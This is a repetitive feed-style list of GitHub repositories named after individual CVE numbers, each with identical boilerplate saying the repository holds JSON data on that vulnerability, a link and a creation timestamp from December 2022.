**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3901 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3901](https://github.com/Live-Hack-CVE/CVE-2019-3901) create time: 2022-12-23T12:53:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6546 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6546](https://github.com/Live-Hack-CVE/CVE-2019-6546) create time: 2022-12-23T12:53:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6547 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6547](https://github.com/Live-Hack-CVE/CVE-2019-6547) create time: 2022-12-23T12:53:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6548 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6548](https://github.com/Live-Hack-CVE/CVE-2019-6548) create time: 2022-12-23T12:53:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6557](https://github.com/Live-Hack-CVE/CVE-2019-6557) create time: 2022-12-23T12:53:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6555](https://github.com/Live-Hack-CVE/CVE-2019-6555) create time: 2022-12-23T12:53:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6559](https://github.com/Live-Hack-CVE/CVE-2019-6559) create time: 2022-12-23T12:52:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6561](https://github.com/Live-Hack-CVE/CVE-2019-6561) create time: 2022-12-23T12:52:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6562](https://github.com/Live-Hack-CVE/CVE-2019-6562) create time: 2022-12-23T12:52:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6565 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6565](https://github.com/Live-Hack-CVE/CVE-2019-6565) create time: 2022-12-23T12:52:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6522 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6522](https://github.com/Live-Hack-CVE/CVE-2019-6522) create time: 2022-12-23T12:52:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2801](https://github.com/Live-Hack-CVE/CVE-2020-2801) create time: 2022-12-23T12:57:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15503 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15503](https://github.com/Live-Hack-CVE/CVE-2020-15503) create time: 2022-12-23T12:52:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35509 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35509](https://github.com/Live-Hack-CVE/CVE-2020-35509) create time: 2022-12-23T12:51:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43258 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43258](https://github.com/Live-Hack-CVE/CVE-2021-43258) create time: 2022-12-23T12:58:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3827 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3827](https://github.com/Live-Hack-CVE/CVE-2021-3827) create time: 2022-12-23T12:56:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4228](https://github.com/Live-Hack-CVE/CVE-2021-4228) create time: 2022-12-23T12:50:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46279 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46279](https://github.com/Live-Hack-CVE/CVE-2021-46279) create time: 2022-12-23T12:50:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45925 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45925](https://github.com/Live-Hack-CVE/CVE-2021-45925) create time: 2022-12-23T12:50:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44776](https://github.com/Live-Hack-CVE/CVE-2021-44776) create time: 2022-12-23T12:50:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44769 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44769](https://github.com/Live-Hack-CVE/CVE-2021-44769) create time: 2022-12-23T12:50:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44467](https://github.com/Live-Hack-CVE/CVE-2021-44467) create time: 2022-12-23T12:50:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26733 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26733](https://github.com/Live-Hack-CVE/CVE-2021-26733) create time: 2022-12-23T12:50:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26732](https://github.com/Live-Hack-CVE/CVE-2021-26732) create time: 2022-12-23T12:49:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26731](https://github.com/Live-Hack-CVE/CVE-2021-26731) create time: 2022-12-23T12:49:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3861](https://github.com/Live-Hack-CVE/CVE-2022-3861) create time: 2022-12-23T12:58:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2650 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2650](https://github.com/Live-Hack-CVE/CVE-2022-2650) create time: 2022-12-23T12:58:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41712](https://github.com/Live-Hack-CVE/CVE-2022-41712) create time: 2022-12-23T12:58:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41875](https://github.com/Live-Hack-CVE/CVE-2022-41875) create time: 2022-12-23T12:57:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0698 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0698](https://github.com/Live-Hack-CVE/CVE-2022-0698) create time: 2022-12-23T12:57:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41705](https://github.com/Live-Hack-CVE/CVE-2022-41705) create time: 2022-12-23T12:57:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41927 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41927](https://github.com/Live-Hack-CVE/CVE-2022-41927) create time: 2022-12-23T12:57:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39833](https://github.com/Live-Hack-CVE/CVE-2022-39833) create time: 2022-12-23T12:57:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41928](https://github.com/Live-Hack-CVE/CVE-2022-41928) create time: 2022-12-23T12:57:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41929 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41929](https://github.com/Live-Hack-CVE/CVE-2022-41929) create time: 2022-12-23T12:57:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41930 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41930](https://github.com/Live-Hack-CVE/CVE-2022-41930) create time: 2022-12-23T12:57:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41931](https://github.com/Live-Hack-CVE/CVE-2022-41931) create time: 2022-12-23T12:57:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41934 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41934](https://github.com/Live-Hack-CVE/CVE-2022-41934) create time: 2022-12-23T12:57:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41935](https://github.com/Live-Hack-CVE/CVE-2022-41935) create time: 2022-12-23T12:57:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30529 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30529](https://github.com/Live-Hack-CVE/CVE-2022-30529) create time: 2022-12-23T12:57:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41932](https://github.com/Live-Hack-CVE/CVE-2022-41932) create time: 2022-12-23T12:57:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23740](https://github.com/Live-Hack-CVE/CVE-2022-23740) create time: 2022-12-23T12:56:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35407 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35407](https://github.com/Live-Hack-CVE/CVE-2022-35407) create time: 2022-12-23T12:56:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35897](https://github.com/Live-Hack-CVE/CVE-2022-35897) create time: 2022-12-23T12:56:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28805](https://github.com/Live-Hack-CVE/CVE-2022-28805) create time: 2022-12-23T12:56:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23743 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23743](https://github.com/Live-Hack-CVE/CVE-2022-23743) create time: 2022-12-23T12:56:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44748 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44748](https://github.com/Live-Hack-CVE/CVE-2022-44748) create time: 2022-12-23T12:56:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44749 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44749](https://github.com/Live-Hack-CVE/CVE-2022-44749) create time: 2022-12-23T12:56:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4136](https://github.com/Live-Hack-CVE/CVE-2022-4136) create time: 2022-12-23T12:56:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40266](https://github.com/Live-Hack-CVE/CVE-2022-40266) create time: 2022-12-23T12:56:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41958 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41958](https://github.com/Live-Hack-CVE/CVE-2022-41958) create time: 2022-12-23T12:56:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37301 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37301](https://github.com/Live-Hack-CVE/CVE-2022-37301) create time: 2022-12-23T12:55:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26885](https://github.com/Live-Hack-CVE/CVE-2022-26885) create time: 2022-12-23T12:55:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0222](https://github.com/Live-Hack-CVE/CVE-2022-0222) create time: 2022-12-23T12:55:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45872](https://github.com/Live-Hack-CVE/CVE-2022-45872) create time: 2022-12-23T12:55:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-0855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-0855](https://github.com/Live-Hack-CVE/CVE-2009-0855) create time: 2022-12-23T12:08:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2589](https://github.com/Live-Hack-CVE/CVE-2014-2589) create time: 2022-12-23T11:25:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-6460 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-6460](https://github.com/Live-Hack-CVE/CVE-2015-6460) create time: 2022-12-23T11:25:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-12562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-12562](https://github.com/Live-Hack-CVE/CVE-2017-12562) create time: 2022-12-23T11:25:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-6195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-6195](https://github.com/Live-Hack-CVE/CVE-2018-6195) create time: 2022-12-23T12:07:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-11135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-11135](https://github.com/Live-Hack-CVE/CVE-2018-11135) create time: 2022-12-23T12:07:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19274](https://github.com/Live-Hack-CVE/CVE-2018-19274) create time: 2022-12-23T12:07:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19296](https://github.com/Live-Hack-CVE/CVE-2018-19296) create time: 2022-12-23T12:07:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3893](https://github.com/Live-Hack-CVE/CVE-2018-3893) create time: 2022-12-23T11:25:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3895](https://github.com/Live-Hack-CVE/CVE-2018-3895) create time: 2022-12-23T11:25:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3897](https://github.com/Live-Hack-CVE/CVE-2018-3897) create time: 2022-12-23T11:25:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3896](https://github.com/Live-Hack-CVE/CVE-2018-3896) create time: 2022-12-23T11:25:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3894 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3894](https://github.com/Live-Hack-CVE/CVE-2018-3894) create time: 2022-12-23T11:25:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9057 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9057](https://github.com/Live-Hack-CVE/CVE-2019-9057) create time: 2022-12-23T12:07:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9058](https://github.com/Live-Hack-CVE/CVE-2019-9058) create time: 2022-12-23T12:07:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9061](https://github.com/Live-Hack-CVE/CVE-2019-9061) create time: 2022-12-23T12:07:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10745 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10745](https://github.com/Live-Hack-CVE/CVE-2019-10745) create time: 2022-12-23T12:06:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14379 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14379](https://github.com/Live-Hack-CVE/CVE-2019-14379) create time: 2022-12-23T12:06:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16328 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16328](https://github.com/Live-Hack-CVE/CVE-2019-16328) create time: 2022-12-23T12:06:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17315](https://github.com/Live-Hack-CVE/CVE-2019-17315) create time: 2022-12-23T12:06:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17316 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17316](https://github.com/Live-Hack-CVE/CVE-2019-17316) create time: 2022-12-23T12:06:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10768 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10768](https://github.com/Live-Hack-CVE/CVE-2019-10768) create time: 2022-12-23T12:06:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17317 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17317](https://github.com/Live-Hack-CVE/CVE-2019-17317) create time: 2022-12-23T12:06:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10806 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10806](https://github.com/Live-Hack-CVE/CVE-2019-10806) create time: 2022-12-23T12:05:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4227](https://github.com/Live-Hack-CVE/CVE-2019-4227) create time: 2022-12-23T11:35:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4236 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4236](https://github.com/Live-Hack-CVE/CVE-2019-4236) create time: 2022-12-23T11:34:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4241 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4241](https://github.com/Live-Hack-CVE/CVE-2019-4241) create time: 2022-12-23T11:34:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4212 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4212](https://github.com/Live-Hack-CVE/CVE-2019-4212) create time: 2022-12-23T11:34:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4246 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4246](https://github.com/Live-Hack-CVE/CVE-2019-4246) create time: 2022-12-23T11:34:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4211 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4211](https://github.com/Live-Hack-CVE/CVE-2019-4211) create time: 2022-12-23T11:34:25Z

